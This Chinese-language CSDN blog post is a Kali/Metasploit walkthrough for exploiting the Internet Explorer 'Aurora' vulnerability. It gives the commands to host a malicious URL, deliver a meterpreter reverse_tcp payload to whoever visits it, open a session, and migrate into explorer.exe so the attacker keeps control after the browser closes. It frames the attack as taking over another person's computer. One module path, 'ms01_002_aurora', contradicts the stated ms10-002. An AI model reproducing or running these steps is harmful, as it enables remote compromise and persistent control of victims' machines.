利用IE浏览器漏洞入侵

Kali渗透实战 专栏收录该内容
8 篇文章 9 订阅

目的:利用ie浏览器的aurora漏洞获得目标shell权限
实战:
1.开启渗透利用框架

msfconsole

2.搜索这个漏洞(代号 ms10-002)

search ms10-002

3.使用搜索出的攻击模块

use exploit/windows/browser/ms01_002_aurora

4.显示要设置的参数

show options

5.设置参数(kali ip)

set SRVHOST 192.168.1.176
set SRVPORT 8080
set URIPATH xiaobai

6.设置载荷
1-5是设置我们的恶意服务器。这里设置载荷,当别人访问时,我们发送载荷(远控程序)

set payload windows/meterpreter/reverse_tcp

7.设置kali监听和端口(端口可以使用默认的4444也可以自己写)

set lhost 192.168.1.176

8.执行

run

在这里插入图片描述
复制如图网址,只要目标使用ie浏览器访问,他就会连接到我们kali的恶意服务器上,就有可能触发该漏洞

9.目标使用IE浏览器访问

10.kali自动向目标主机发送漏洞入侵的代码
在这里插入图片描述
利用成功后如图所示
在这里插入图片描述
注意:可能一直处于发送状态,此时要关闭IE,重新打开并输入网址

11.看后台有没有建立会话
先回车

session

在这里插入图片描述
发现已经建立会话

12.建立会话后

sessions 1

在这里插入图片描述
此时成功导出了meterpreter会话,入侵成功。输入?即可查看可以输入的命令

13.进程迁移(目标关闭浏览器后,继续控制)
(1)查看进程,并找到explorer.exe(资源管理器):

ps

(2)进程迁移(假如explorer.exe进程是4064)

migrate 4064

此时就算对方关闭浏览器,我们也能控制对方

  • 0
    点赞
  • 0
    评论
  • 4
    收藏
  • 一键三连
    一键三连
  • 扫一扫,分享海报

©️2021 CSDN 皮肤主题: 深蓝海洋 设计师:CSDN官方博客 返回首页
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、C币套餐、付费专栏及课程。

余额充值